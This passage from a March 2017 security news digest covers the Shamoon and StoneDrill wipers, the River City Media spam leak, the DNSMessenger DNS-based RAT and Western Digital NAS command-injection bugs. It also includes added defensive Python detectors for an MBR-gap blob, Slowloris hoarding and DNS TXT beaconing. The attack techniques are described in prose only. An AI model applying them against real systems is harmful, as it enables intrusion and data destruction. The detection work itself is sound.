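    """Triage a raw disk image: is there data right after the MBR where a plain
    MBR disk usually has only zeros?  Returns a summary for the analyst."""
    mbr = image[:SECTOR]
    gap = image[GAP_START:GAP_START + gap_sectors * SECTOR]
    nonzero = [i for i, b in enumerate(gap) if b]
    result = {
        "mbr_signature_ok": mbr[510:512] == MBR_SIGNATURE,
        "gap_nonzero_bytes": len(nonzero),
        "first_nonzero_offset": None,   # absolute offset within the image
        "gap_entropy": 0.0,
    }
    if nonzero:
        first, last = nonzero[0], nonzero[-1]
        result["first_nonzero_offset"] = GAP_START + first
        result["gap_entropy"] = shannon_entropy(gap[first:last + 1])
    return result


def constructed_image(with_blob):
    """Constructed sample: a 16 KiB image with a minimal MBR and, optionally, an
    opaque high-entropy blob at offset 0x201.  The blob is SHA-256 output chained
    from a fixed seed, standing in for 'RSA-encrypted key material' only in the
    sense of being random-looking bytes at the reported location."""
    img = bytearray(32 * SECTOR)
    img[510:512] = MBR_SIGNATURE
    if with_blob:
        blob, seed = b"", b"constructed-sample"
        while len(blob) < 256:
            seed = hashlib.sha256(seed).digest()
            blob += seed
        img[0x201:0x201 + len(blob)] = blob
    return bytes(img)


if __name__ == "__main__":
    for label, tampered in (("clean", False), ("blob at 0x201", True)):
        print(label, inspect_mbr_gap(constructed_image(tampered)))
```

On a real image, pair the offset with what the analyst already knows about the disk: a hit at 0x200 on a GRUB-booted Linux host is expected and will have code-like entropy, whereas a short, near-maximum-entropy run starting exactly at 0x201 on a Windows machine is worth carving out and comparing against the description in the report.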

Shamoon is not the only wiper whose authors have recently decided to add ransomware functionality to their creation. Late last year, researchers reported that a variant of the KillDisk malware, which had been involved in the attacks on Ukraine’s energy sector, had been designed to encrypt files and hold them for ransom instead of deleting them.

Kaspersky Lab also revealed that the resources used by Shamoon appear to have a Yemeni Arabic language ID. While this could indicate that the threat group behind Shamoon is located in Yemen, which would also have a good reason to target Saudi Arabia, it’s also possible that this is a false flag. Previously, researchers attributed the Shamoon attacks to Iran.


CA Technologies to Acquire Veracode for $614 Million

7.3.2017 securityweek IT
Enterprise software firm CA Technologies (NASDAQ:CA) announced on Monday that it has signed a definitive agreement to acquire Veracode, a provider of application security testing solutions, for roughly $614 million in cash.

Burlington, Mass.-based Veracode offers a cloud-based application security testing service that helps companies secure web, mobile and third-party applications. Veracode’s platform offers centralized policies and KPIs that help reduce risk and measure progress across business units and development teams, including third-party suppliers, outsourcers and open source developers.


The company has raised more than $134 million in funding, including a $40 million investment in late 2014.

“The combination of CA’s portfolio with privately-held Veracode will establish CA Technologies as a leader in the Secure DevOps market through the automation and scaling of application security testing (AST) to develop and deploy applications faster with fewer defects,” CA said in an announcement. “With Veracode, CA Technologies bridges its Security business with its broad DevOps portfolio and adds to its growing SaaS business.”

"This acquisition will unify CA’s Security and DevOps portfolios with a SaaS- based platform that seamlessly integrates security into the software development process. Looking holistically at our portfolio, now with Veracode and Automic, we have accelerated the growth profile of our broad set of solutions.”

“We provide over 1400 small and large enterprise customers the security they need to confidently innovate with the web and mobile applications they build, buy and assemble, as well as the components they integrate into their environments,” said Bob Brennan, CEO of Veracode. “By joining forces with CA Technologies, we will continue to better address growing security concerns, and enable them to accelerate delivery of secure software applications that can create new business value.”

The transaction is expected to close in the first quarter of fiscal year 2018.

Founded in 2006, Veracode has offices in Burlington, MA and London and has more than 500 employees globally.

The application security space has been hot, and the acquisition of Veracode follows other notable acquisitions in the space. In November 2016, Synopsys, a company that provides tools and services for designing chips and electronic systems, announced that it would acquire Cigital, a provider of software security testing solutions, along with Cigital spin-off Codiscope, which also provides security tools. Coverity, another application security provider, was also acquired by Synopsys for approximately $375 million in February 2014, while Cenzic was acquired by Trustwave in March 2014 for an undisclosed sum. Fortify, a pioneer in the software security space, was acquired by HP in 2010.


The 1.4 Billion records recently leaked come from the DB of the World’s Biggest Spam Networks
7.3.2017 securityaffairs Spam

A few days ago the expert Chris Vickery announced that he would reveal the source of a massive data leak. Now he says it is from the world’s biggest spam network.
A few days ago the popular cyber security expert Chris Vickery from security firm MacKeeper announced that he will shortly reveal the source of a huge data breach impacting individuals.

The huge archive contains 1.4 billion email addresses, names, physical addresses and IP addresses. It will surely be one of the largest data breaches of 2017.

Vickery also offered a teaser of the leak, reducing the number of identities by 30,000.


Chris Vickery (@VickerySec) tweeted on 4 Mar 2017: “Teaser screenshot of that DB's summary data:”
Security experts made several hypotheses about the identity of the alleged victim of the data breach; one of them was Aadhaar, the world’s largest biometric ID system, with over 1.123 billion enrolled members as of 28 February 2017.
The Unique Identification Authority of India (UIDAI) promptly denied that its archive was the source of the leak.

The reality is quite different.

Vickery shared the data with the expert Steve Ragan from Salted Hash and discovered an unsecured repository of backup files linked to a notorious spamming organization called River City Media (RCM).

“This is the story of how River City Media (RCM), Alvin Slocombe, and Matt Ferris, accidentally exposed their entire operation to the public after failing to properly configure their Rsync backups.” reported Salted Hash.

“The data from this well-known, but slippery spamming operation, was discovered by Chris Vickery, a security researcher for MacKeeper and shared with Salted Hash, Spamhaus, as well as relevant law enforcement agencies.”


The huge archive includes sensitive information about the operations of River City Media, a company that claims to be a legitimate marketing firm but that is the source of a billion spam messages per day.

Vickery didn’t reach out to RCM directly, so he was not able to fully verify the huge data leak, but he explained that the archive includes addresses he knew very well and that were accurate.

“The situation presents a tangible threat to online privacy and security as it involves a database of 1.4bn email accounts combined with real names, user IP addresses, and often physical address,” Vickery said. “Chances are that you, or at least someone you know, is affected.”

What about the spamming business?

No doubt, spamming operations are very profitable.

The leaked data shows that RCM sent 18 million emails to Gmail users and 15 million to AOL users in a single day, and the company earned around $36,000. Not so
The River City Media company used many illegal hacking techniques to send spam messages to as many users as possible.

One of these techniques is a variant of the Slowloris attack, a method normally used to paralyze a web server rather than to subvert it.

“Purposely throttling your own machinery to amass open connections on someone else’s server is a type of Slowloris attack [https://en.wikipedia.org/wiki/Slowloris_(computer_security)]. The twist here is that the spammer is not trying to completely disable the receiving server, he is only temporarily stressing the resources in order to overwhelm and force the processing of bulk email.” Vickery explained in a blog post.

Vickery characterized RCM’s hacking activity as illegal because of the presence of scripts and logs enumerating the group’s many missions to probe and exploit vulnerable mail servers. The leaked backups include chat logs in which company personnel admit to and describe the use of hacking methods.


“In that screenshot, an RCM co-conspirator describes a technique in which the spammer seeks to open as many connections as possible between themselves and a Gmail server. This is done by purposefully configuring your own machine to send response packets extremely slowly, and in a fragmented manner, while constantly requesting more connections.”

The expert has shared details of RCM’s operations with other parties, including Microsoft, Apple, Salted Hash, Spamhaus and, of course, law enforcement.

To block the activity of the group, Spamhaus announced that it is blacklisting the entire infrastructure used by RCM in its Register of Known Spam Operations (ROKSO) database, a service that tracks professional spam operations.

Chris Vickery has discovered many other notable cases of databases left exposed on the Internet. In December 2015 he found 191 million records belonging to US voters online, and in April 2016 he discovered a 132 GB MongoDB database open online containing 93.4 million Mexican voter records.

In March 2016, Chris Vickery discovered online the database of the Kinoptic iOS app, which had been abandoned by its developers, containing details of over 198,000 users.

In January 2017, the expert discovered online an open Rsync server hosting the personal details for at least 200,000 IndyCar racing fans.


FCC gives full powers to US ISPs, they can sell users’ data without consent
7.3.2017 securityaffairs Security

The United States Federal Communications Commission (FCC) announced the suspension of the privacy rules just before they came into effect.
Some consider privacy a modern utopia: it is threatened daily by law enforcement, intelligence agencies and authoritarian regimes.

Unfortunately, I have bad news for privacy defenders.

In October 2016, the United States Federal Communications Commission (FCC) passed a set of privacy rules for ISPs that barred them from using user data for marketing or commercial purposes. The rules prohibit ISPs from sharing user data with third parties without the user’s explicit consent. The set of rules also requires ISPs to implement “reasonable measures” to protect data from cyber threats.

Back to the present, the FCC announced the suspension of the privacy rules just before they came into effect.

“Until that happens, however, we will work together on harmonizing the FCC’s privacy rules for broadband providers with the FTC’s standards for other companies in the digital economy. Accordingly, the FCC today stayed one of its rules before it could take effect on March 2,” reads a joint statement of FCC Chairman Ajit Pai and Acting FTC Chairman Maureen K. Ohlhausen on protecting Americans’ online privacy.

“This rule is not consistent with the FTC’s privacy framework. The stay will remain in place only until the FCC is able to rule on a petition for reconsideration of its privacy rules.”

This means that Internet Service Providers (ISPs) can use customers’ data for commercial purposes.

Consider that ISPs are a kind of sentinel of the Internet: from their vantage point it is possible to monitor users’ activities and profile them.

The data collected on users is then shared with advertising firms for commercial purposes.

Ajit Pai is the Chairman of the Federal Communications Commission; he was designated Chairman by President Donald Trump in January 2017.

Ajit Pai is known as an opponent of net neutrality, which he has publicly called “a mistake.”

Pai is arguing that the privacy rules favored IT tech giants like Google and Facebook, which are regulated by the Federal Trade Commission (FTC), over ISPs like Verizon and Comcast.


He is therefore asking for equal treatment of Internet firms by the FTC and the FCC.

“All actors in the online space should be subject to the same rules, enforced by the same agency,” the FCC said in a statement.

The FCC will block the new privacy rules because it will never go against IT giants like Google and Facebook over the way they commercialize users’ data; it is likely that the FCC will never restore the suspended rules on ISPs.


Kaspersky Lab discovered a new sophisticated Shamoon-Linked malware dubbed StoneDrill
7.3.2017 securityaffairs Virus

The experts spotted a new sophisticated strain of malware dubbed StoneDrill that is linked to Shamoon 2 and Charming Kitten.
Researchers at Kaspersky Lab have discovered further information about the dreaded Shamoon 2 malware. The experts spotted a new sophisticated strain of malware dubbed StoneDrill that is linked to Shamoon 2 and Charming Kitten (aka Newscaster and NewsBeef). StoneDrill can be used for both cyber espionage and sabotage; like Shamoon, it wipes the infected computer.

The malware was used by threat actors against entities in Saudi Arabia and at least one organization in Europe.

“While investigating the Shamoon 2.0 attacks, Kaspersky Lab also discovered a previously unknown wiper malware which appears to be targeting organizations in Saudi Arabia. We’re calling this new wiper StoneDrill. StoneDrill has several “style” similarities to Shamoon, with multiple interesting factors and techniques to allow for the better evasion of detection.” reads the analysis shared by Kaspersky Lab. “In addition to suspected Saudi targets, one victim of StoneDrill was observed on the Kaspersky Security Network (KSN) in Europe. This makes us believe the threat actor behind StoneDrill is expanding its wiping operations from the Middle East to Europe.”


At the time the report was published by Kaspersky, there were no reports of StoneDrill attacks that had caused damage.

The discovery of the new threat was accidental: researchers were using a set of Yara rules developed to identify the Shamoon malware.

Although StoneDrill and Shamoon don’t share portions of code, the experts discovered many similarities in style and in components between Shamoon, StoneDrill, and NewsBeef.

The researchers are still investigating the infection process; they confirmed that StoneDrill implements sophisticated techniques to evade security applications.

While Shamoon uses drivers during deployment, StoneDrill injects the wiping module directly into the memory of the victim’s browser.

The wiper feature has been implemented using a new technique.

The wiper is able to target both physical and logical drives and reboots the system once the wipe process is completed.

“Depending on the configuration, this module wipes with random data one of the following possible targets:

All accessible physical drives by using the device path “\\.\PhysicalDrive”
All accessible logical drives by using the device path “\\.\X:”
Recursively wipes and deletes files in all folders except “Windows” on all accessible logical drives
Places a special emphasis on wiping files named “asdhgasdasdwqe%digits%” in the root folder of the disk.”
The researchers at Kaspersky have detected a StoneDrill sample that was specifically designed to establish a backdoor on the infected system. The sample was likely developed for espionage purposes.

The experts identified four C&C servers used in cyber espionage activities, which means that StoneDrill uses C&C communications to receive instructions from the attackers.

Researchers discovered that StoneDrill has many similarities (code, C&C naming conventions, backdoor commands and functionality, and Winmain signatures) to a strain of malware used by Charming Kitten.

For this reason, it is considered an evolution of the Charming Kitten malware.


Is the same threat actor behind both StoneDrill and Shamoon?

According to the experts from Kaspersky, two separate groups are behind the threats, though they share the same objectives.

“While Shamoon embeds Arabic-Yemen resource language sections, StoneDrill embeds mostly Persian resource language sections. Of course, we do not exclude the possibility of false flags.” reads the report.

The last variant of the Shamoon malware that targeted organizations in Saudi Arabia also includes a newly discovered ransomware component.

According to the experts, the ransomware component of Shamoon 2 has yet to be used in the wild.

“Despite the widespread coverage of the resurgence of the Shamoon wiper, few have noted the new ransomware functionality. The wiper module of Shamoon 2.0 has been designed to run as either a wiper or an encryptor (ransomware),” reads Kaspersky’s analysis. “In the “encryption/ransomware” mode, a weak pseudo-random RC4 key is generated, which is further encrypted by the RSA public key and stored directly on the hard drive (at <\Device\Harddisk0\Partition0>) starting at offset 0x201, right after the master boot record”


According to the latest report, ransomware saw a 752 percent increase

7.3.2017 SecurityWorld Viruses
Trend Micro has released its latest annual security report, 2016 Security Roundup: A Record Year for Enterprise Threats, which confirms that 2016 was the year of online extortion. Cyber threats reached an all-time high last year, mainly thanks to the growing popularity of ransomware and of attacks exploiting corporate email (Business Email Compromise, BEC).

A 752 percent increase in new ransomware families caused companies around the world losses of USD 1 billion. Trend Micro, together with the Zero Day Initiative (ZDI), disclosed a total of 765 vulnerabilities during 2016. 678 of them were found through the ZDI bug bounty program; ZDI verifies the risks discovered this way and then informs the affected vendors.

Compared with 2015, Apple saw an increase (145 percent) in vulnerabilities discovered by Trend Micro and ZDI, while Microsoft can boast a 47 percent lower number of potentially dangerous bugs. There was also a 71 percent decrease in the use of newly discovered vulnerabilities in exploit kits, partly caused by the arrest of the people behind the Angler kit in June 2016.

“As threats diversify and become ever more sophisticated, cybercriminals have shifted their interest from individuals to where the money is, namely to businesses,” said Ed Cabrera, Chief Cybersecurity Officer at Trend Micro. “Throughout 2016 we witnessed the extortion of companies and organizations for profit, and we do not expect this trend to slow down. Our research aims to provide businesses with information about the tactics attackers actively use to compromise their data, and to help them take measures that allow them to stay a step ahead of cybercriminals and protect themselves against potential attacks.”

Trend Micro’s global Smart Protection Network service blocked more than 81 billion threats during 2016, a full 56 percent more than in 2015. In the second half of 2016, more than 3,000 attacks per second were being blocked. Over the whole of last year, 75 billion of the blocked attempts were email-based, and such high numbers confirm that email remains the main entry point for cybercriminals into a victim’s infrastructure or computer.

The Czech Republic accounted for only 0.17 percent of the total number of threats, and 0.70 percent within the EMEA region. Both values are worse than, for example, Slovakia (0.06 % and 0.23 %) and better than, for example, Poland (1.02 % and 4.08 %). The most widespread malware detected in the Czech Republic in 2016 was Nemucod, and the most frequently blocked domain, for example, was militarismreptilesoapsud.com.

The main findings for 2016 include:

Growth of ransomware: over 12 months the number of ransomware families rose from 29 to 247. One of the main reasons for this high growth is the profitability of this type of threat. Although individuals and organizations are warned against paying ransoms, cybercriminals still made approximately USD 1 billion last year alone.
Rise of attacks and fraud via corporate email (BEC): as with ransomware, cybercrime based on BEC threats proved to be incredibly lucrative. As a result of its high popularity, companies around the world lost an average of USD 14,000. This type of threat is also proof of the effectiveness of social engineering techniques in attacks targeting the corporate sector.
Diversity of vulnerabilities: Trend Micro, together with the Zero Day Initiative, discovered a record number of vulnerabilities in 2016, most of which were found in Adobe Acrobat Reader DC and in Advantech’s WebAccess tool. Both applications are widely used in enterprise information architectures and in SCADA (Supervisory Control and Data Acquisition) systems.
Exploit kits’ fall from fame: after the arrest of 50 cybercriminals, the formerly dominant Angler exploit kit is slowly fading away. And although it did not take long for new exploit kits to begin filling the vacated space, the number of vulnerabilities included in exploit kits fell by 71 percent by the end of 2016.
Banking trojans and ATM malware: cybercriminals use ATM malware, payment-card skimming and banking trojans. However, the attacks have diversified in recent years, with attackers obtaining personal identification and access credentials that can also be used to break into corporate networks.
Massive attacks using the Mirai malware: in October 2016 attackers exploited the poor security of Internet of Things devices and used approximately 100,000 of them to carry out a distributed denial-of-service (DDoS) attack on selected services such as Twitter, Reddit and Spotify, which were unavailable for several hours.
Historic data breach at Yahoo: in Yahoo’s case the largest data breach in history, affecting one billion user accounts, had already occurred in August 2013, but the incident was not disclosed until three months after a further breach in September 2016 affecting 500 million accounts. These events sparked a debate about disclosure and the responsibility companies have toward their customers regarding the security of user data.


Database of 1.4 Billion Records leaked from World’s Biggest Spam Networks
6.3.2017 thehackernews Spam
A database of 1.4 billion email addresses combined with real names, IP addresses, and often physical addresses has been exposed in what appears to be one of the largest data breaches of this year.
What's worrisome? There are high chances that you, or at least someone you know, is affected by this latest data breach.
Security researcher Chris Vickery of MacKeeper and Steve Ragan of CSOOnline discovered an unsecured and publicly exposed repository of network-available backup files linked to a notorious spamming organization called River City Media (RCM), led by notorious spammers Matt Ferrisi and Alvin Slocombe.
Spammer’s Entire Operation Exposed

The database contains sensitive information about the company's operations, including nearly 1.4 billion user records, which were left completely exposed to anyone, without any username or password required.
According to MacKeeper security researcher Vickery, RCM, which claims to be a legitimate marketing firm, is responsible for sending around a billion unwanted messages per day.
Besides exposing more than a billion email addresses, real names, IP addresses and, in some cases, physical addresses, the leak exposed many documents that revealed the inner workings of RCM's spam operation.
"The situation presents a tangible threat to online privacy and security as it involves a database of 1.4bn email accounts combined with real names, user IP addresses, and often physical address," Vickery said. "Chances are that you, or at least someone you know, is affected."
Vickery wasn't able to fully verify the leak but said he discovered addresses he knew were accurate in the database.
Wondering how spamming operations can be profitable? One leaked text shows a single day of activity of RCM that sent 18 million emails to Gmail users and 15 million to AOL users, and the total take of the spamming company was around $36,000.
Illegal Hacking Techniques Used by RCM

The company employed many illegal hacking techniques to target as many users as possible. One of the primary hacking methods described by the researchers is the Slowloris attack, a method normally designed to cripple a web server rather than to subvert it; RCM used it differently.
"[Slowloris is] a technique in which the spammer seeks to open as many connections as possible between themselves and a Gmail server," Vickery writes in a blog post published today.
"This is done by purposefully configuring your own machine to send response packets extremely slowly, and in a fragmented manner, while constantly requesting more connections."
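The Slowloris variant described here, and in the earlier article above, is a per-source pattern: one client deliberately holding many slow, unfinished connections. The following added example (not code from the articles or from the researchers they quote) shows how a mail or web server operator can pick that pattern out of a snapshot of the connection table; the connection records and the thresholds are constructed assumptions to tune per server.

```python
"""Detect Slowloris-style connection hoarding from a server's connection table.

Added example (not code from the original articles or the researchers they
quote). The connection snapshot below is constructed sample data; the
thresholds are assumptions you would tune for your own server.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Conn:
    src_ip: str
    age_s: float      # seconds since the TCP connection was accepted
    bytes_in: int     # bytes received from the client so far
    complete: bool    # has the client finished its request/command?


# Constructed snapshot of open connections as a server would see them.
# 10.0.0.5 holds many old, slow, unfinished connections (the Slowloris
# pattern); the other clients behave normally, including one slow client
# that is not hoarding.
SAMPLE_CONNS = [
    Conn("10.0.0.5", 95.0, 40, False),
    Conn("10.0.0.5", 93.0, 38, False),
    Conn("10.0.0.5", 88.0, 41, False),
    Conn("10.0.0.5", 80.0, 35, False),
    Conn("10.0.0.5", 72.0, 44, False),
    Conn("10.0.0.5", 61.0, 39, False),
    Conn("192.0.2.10", 2.0, 1500, True),
    Conn("192.0.2.11", 0.5, 900, True),
    Conn("192.0.2.12", 45.0, 20, False),
]


def slow_incomplete(c, min_age_s, max_rate_bps):
    """An incomplete connection that is old and has trickled in very little
    data is the per-connection signature of a deliberately throttled client."""
    if c.complete or c.age_s < min_age_s:
        return False
    return c.bytes_in / c.age_s < max_rate_bps


def find_hoarders(conns, min_age_s=30.0, max_rate_bps=5.0, min_conns=5):
    """Return {src_ip: count} for sources holding at least min_conns slow,
    incomplete connections. A single slow client (a bad link, a tiny device)
    is normal; many from one source is the hoarding pattern."""
    per_src = defaultdict(int)
    for c in conns:
        if slow_incomplete(c, min_age_s, max_rate_bps):
            per_src[c.src_ip] += 1
    return {ip: n for ip, n in per_src.items() if n >= min_conns}


if __name__ == "__main__":
    print(find_hoarders(SAMPLE_CONNS))   # {'10.0.0.5': 6}
```

Sources flagged this way are candidates for a per-source connection cap or a shorter header/command timeout, which are the standard server-side mitigations for slow-connection attacks.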
The researchers have reported that details of RCM’s operations and its abusive scripts and techniques have been sent to Microsoft, Apple, Salted Hash, Spamhaus, and other affected parties.
Meanwhile, the researchers have also notified law enforcement agencies, which, they say, have expressed keen interest in the matter.
In response to the latest discovery, Spamhaus will be blacklisting RCM’s entire infrastructure from its Register of Known Spam Operations (ROKSO) database that tracks professional spam operations and lists them using a three-strike rule.


New Fileless Malware Uses DNS Queries To Receive PowerShell Commands
6.3.2017 thehackernews Virus

It is no secret that cybercriminals are becoming dramatically more adept, innovative, and stealthy with each passing day.
While new forms of cybercrime are on the rise, traditional activities seem to be shifting towards more clandestine techniques that involve the exploitation of standard system tools and protocols, which are not always monitored.
The latest example of such an attack is DNSMessenger, a new Remote Access Trojan (RAT) that uses DNS queries to execute malicious PowerShell commands on compromised computers, a technique that makes the RAT difficult to detect on targeted systems.
The Trojan came to the attention of Cisco's Talos threat research group through a security researcher named Simpo, who highlighted in a tweet a PowerShell script whose encoded text read 'SourceFireSux.' SourceFire is one of Cisco's corporate security products.
DNSMessenger Attack Is Completely Fileless
Further analysis of the malware ultimately led Talos researchers to discover a sophisticated attack comprising a malicious Word document and a PowerShell backdoor communicating with its command-and-control servers via DNS requests.
Distributed through an email phishing campaign, the DNSMessenger attack is completely fileless, as it does not involve writing files to the targeted system; instead, it uses DNS TXT messaging capabilities to fetch malicious PowerShell commands stored remotely as DNS TXT records.
This feature makes it invisible to standard anti-malware defenses.
PowerShell is a powerful scripting language built into Windows that allows for the automation of system administration tasks.

The malicious Word document has been crafted "to appear as if it were associated with a secure e-mail service that is secured by McAfee," according to a blog post published by Talos researchers Edmund Brumaghin and Colin Grady on Thursday.
Here's How the DNSMessenger attack Works:
When opened, the document launches a Visual Basic for Applications (VBA) macro to execute a self-contained PowerShell script in an attempt to run the backdoor on the target system.
What's interesting? Everything, until this point, is done in memory, without writing any malicious files to the system's disk.
Next, the VBA script unpacks a compressed and sophisticated second stage of PowerShell, which involves checking for several parameters of the target environment, like the privileges of the logged-in user and the version of PowerShell installed on the target system.
This information is then used to ensure persistence on the infected host by changing the Windows Registry and installing a third stage PowerShell script that contains a simple backdoor.
If the victim has administrative access, the backdoor is added to the Windows Management Instrumentation (WMI) database, allowing the malware to remain persistent on the system even after a reboot.
The backdoor is an additional script that establishes a sophisticated two-way communications channel over the Domain Name System (DNS), which is usually used to look up the IP addresses associated with domain names but supports different types of records.
The DNSMessenger backdoor uses DNS TXT records, which by definition allow a DNS server to attach unformatted text to a response.
The backdoor periodically sends DNS queries to one of a series of domains hard-coded in its source code. As part of those requests, it retrieves the domain's DNS TXT record, which contains further PowerShell commands that are executed but never written to the local system.
Now, this "fourth stage" PowerShell script is the actual remote control tool used by the attacker.
This script queries the command-and-control servers via DNS TXT message requests to ask what commands to execute. Any command received is then executed, and the output is communicated back to the C&C server, allowing the attacker to execute any Windows or application commands on the infected system.
All the attackers need to do is leave malicious commands and instructions inside the TXT records of their domains; when queried, these are executed via the Windows Command Line Processor, and the output is sent back as another DNS query.
The domains registered by the DNSMessenger RAT are all down, so it is not yet known what types of commands the attackers relayed to infected systems. However, the researchers say this particular RAT was used in a small number of targeted attacks.
"This malware sample is an excellent example of the length attackers are willing to go to stay undetected while operating within the environments that they are targeting," the Talos researchers said.
"It also illustrates the importance that in addition to inspecting and filtering network protocols such as HTTP/HTTPS, SMTP/POP3, etc. DNS traffic within corporate networks should also be considered a channel that an attacker can use to implement a fully functional, bidirectional C2 infrastructure."
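Taking up that last point, the exchange described above leaves a distinctive trace in DNS logs: a host polling TXT records of one domain at regular intervals and receiving unusually long answers. This added example (not Talos code, nor from the article) scores client/domain pairs in a constructed query log on exactly those three properties; the log layout "epoch client qname qtype answer_len", the thresholds and the domain names are assumptions.

```python
"""Flag DNS TXT record traffic that looks like a polling command channel.

Added example, not Talos code. Log lines are constructed in an assumed
"epoch client qname qtype answer_len" layout; thresholds are assumptions.
"""
import statistics
from collections import defaultdict

# Constructed query log. 10.1.1.20 polls a TXT record of one domain about
# every 60 s and gets long answers (the DNSMessenger pattern); the other
# queries are ordinary lookups, including legitimate short TXT records.
SAMPLE_LOG = """\
1488800000 10.1.1.20 q1.example-c2.test TXT 420
1488800060 10.1.1.20 q2.example-c2.test TXT 398
1488800121 10.1.1.20 q3.example-c2.test TXT 415
1488800180 10.1.1.20 q4.example-c2.test TXT 402
1488800240 10.1.1.20 q5.example-c2.test TXT 433
1488800012 10.1.1.21 www.example.org A 16
1488800030 10.1.1.21 mail.example.org MX 40
1488800050 10.1.1.21 example.org TXT 60
1488800200 10.1.1.22 _dmarc.example.org TXT 90
"""


def registered_domain(qname, labels=2):
    """Collapse host-specific labels so per-query subdomains group together."""
    parts = qname.rstrip(".").split(".")
    return ".".join(parts[-labels:])


def parse_log(text):
    """Parse the constructed log layout into (ts, client, qname, qtype, alen)."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, qtype, alen = line.split()
        rows.append((int(ts), client, qname, qtype, int(alen)))
    return rows


def txt_channel_suspects(rows, min_queries=4, min_avg_len=200, max_jitter_s=10):
    """Return [(client, domain, n, avg_len, jitter)] for client/domain pairs
    whose TXT lookups are frequent, long-answered and evenly spaced.
    Even spacing (low inter-query jitter) is the beaconing signature of a
    backdoor polling for its next command; long answers carry the payload."""
    groups = defaultdict(list)
    for ts, client, qname, qtype, alen in rows:
        if qtype == "TXT":
            groups[(client, registered_domain(qname))].append((ts, alen))
    suspects = []
    for (client, dom), items in groups.items():
        if len(items) < min_queries:
            continue
        items.sort()
        avg_len = sum(a for _, a in items) / len(items)
        gaps = [b[0] - a[0] for a, b in zip(items, items[1:])]
        jitter = statistics.pstdev(gaps)
        if avg_len >= min_avg_len and jitter <= max_jitter_s:
            suspects.append((client, dom, len(items), avg_len, jitter))
    return suspects


if __name__ == "__main__":
    for s in txt_channel_suspects(parse_log(SAMPLE_LOG)):
        print(s)
```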
This is not the first time researchers have come across fileless malware. Early last month, Kaspersky researchers also discovered fileless malware that resides solely in the memory of compromised computers, targeting banks, telecommunication companies, and government organizations in 40 countries.


Hacker Selling Over 1 Million Decrypted Gmail and Yahoo Passwords On Dark Web
6.3.2017 thehackernews Hacking
Hardly a day goes by without headlines about a significant data breach. In the past year, billions of accounts from popular sites and services, including LinkedIn, Tumblr, MySpace, Last.FM, Yahoo! and VK.com, were exposed on the Internet.
Now, according to recent news, login credentials and other personal data linked to more than one million Yahoo and Gmail accounts are reportedly being offered for sale on a dark web marketplace.
The online accounts listed for sale on the Dark Web allegedly contain usernames, emails, and plaintext passwords. The accounts are not from a single data breach; instead, several major cyber attacks are believed to be the source.
The hacker going by the online handle 'SunTzu583' has listed a number of cracked email packages on a series of dark websites, HackRead reported.
Here's the Full List of Accounts and their Prices:

100,000 Yahoo accounts acquired from 2012 Last.FM data breach, for 0.0084 Bitcoins ($10.76).
Another 145,000 Yahoo accounts acquired from two separate data breaches – the 2013 Adobe data breach and the 2008 MySpace breach – for 0.0102 Bitcoins (USD 13.75).
500,000 Gmail accounts from the 2008 MySpace hack, the 2013 Tumblr breach, and the 2014 Bitcoin Security Forum breach for 0.0219 Bitcoins ($28.24).
Another 450,000 Gmail accounts for 0.0201 BTC (USD 25.76), which came from various other data breaches in Dropbox, Adobe, and others that took place between 2010 and 2016.
Last.FM data breach from 2012 exposed 43 million user accounts that were publicly released in September last year.
Adobe breach from October 2013 exposed over 153 million accounts containing internal IDs, usernames, emails, encrypted passwords and a password hint in plain text.
MySpace data breach from 2008 exposed 360 million user accounts, containing usernames, emails and their decrypted (plaintext) passwords, which were leaked on the dark web in 2016.
Google’s Gmail email service is known to be one of the most secure email services, but no company can protect its users' accounts from hackers when those users' credentials are exposed in a third-party data breach.
Millions of Gmail accounts, with usernames, emails, and plaintext passwords exposed, were stolen in multiple data breaches at Bitcoin Security Forum, Tumblr, Last.fm, 000webhost, Adobe, Dropbox, Flash Flash Revolution, LookBook and Xbox360 ISO that happened between 2008 and 2016.
The data listed for sale by SunTzu583 has not been independently verified by The Hacker News, but has reportedly been checked by matching it to the data on a number of data breach notification platforms, including Hacked-DB and HaveIBeenPwned.
Here's What All You Can Do:
Needless to say, you should immediately change almost all your account passwords at least once.
Also enable two-factor authentication for all your online accounts immediately.
And once again, a strong recommendation: Don't Reuse Passwords.
Also, you are recommended to change your password every few months, which limits how long a stolen password is useful to a hacker.
Since no one can remember and regularly recreate strong passwords for every single online account, the best practice is to use a good password manager. It will generate, store and regularly change strong, unique passwords for all your accounts.


Multiple Zero-days Disclosed in Western Digital NAS Storage Devices

6.3.2017 securityweek Vulnerability

The Western Digital My Cloud range of storage devices, ranging from consumer products with up to 16TB storage (My Cloud Mirror) to business devices with up to 32TB storage (My Cloud Pro and My Cloud Expert) contain multiple firmware vulnerabilities that can be exploited remotely.

Bugs reported by Zenofex of Exploiteers comprise a login bypass, an arbitrary file write, 13 unauthenticated command execution bugs, and 70 bugs that require authentication. The authentication-required bugs can be reached via the login bypass bug.

In a blog posted on Saturday, Zenofex explains that he was analyzing a bug that had separately been found and reported (with others) to Western Digital by ESET researcher Kacper Szurek. In January, Szurek reported that on 1 January 2017, Western Digital told him the issue had been fixed.

Meanwhile, Securify also issued an advisory on the same authentication bypass bug. The timeline is very similar to Szurek's but quotes a different firmware release to fix the bug -- and laments that it had not been informed by Western Digital that the bug had been fixed.

Zenofex does not quote firmware release numbers. He merely wrote on Saturday that in patching the old bug, Western Digital had introduced a new one with the very same consequences into its latest firmware. Western Digital 'fixed' the old cookie-based vulnerability by adding a new "wto_check()" function. The problem here, says Zenofex, "is the incorrect use of the PHP method "escapeshellcmd()" which, in its intended usage, handles an entire command string, and not just an argument... Because of this," he adds, "instead of actually checking if the user is logged in, we can add new arguments and log the user in ourselves."

Once the attacker has logged on, he can exploit any one of many unsanitized CGI scripts. Instead of being properly sanitized, they appear to rely on only being accessible to an authenticated user -- which cannot be guaranteed because of the authentication bypass vulnerability. "This basic pattern resulting in a command injection vulnerability is used multiple times within the many scripts used by the web interface," comments Zenofex. "Also, it is important to note that all commands executed through the web interface are done so as the user the web-server is running as, which, in this case is root."
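The escapeshellcmd() misuse Zenofex describes is a general bug class: an escaper that neutralises shell metacharacters in a whole command string still leaves whitespace alone, so a value that was meant to be one argument is re-split by the shell into several. The following added example (not the Western Digital firmware, which is PHP, nor Zenofex's code) models that behaviour in Python and sets it beside the hardened form; `escape_cmd_string` is a simplified model of PHP's escapeshellcmd(), `login_check` is a placeholder for the checker wto_check() invokes, and the input string is constructed.

```python
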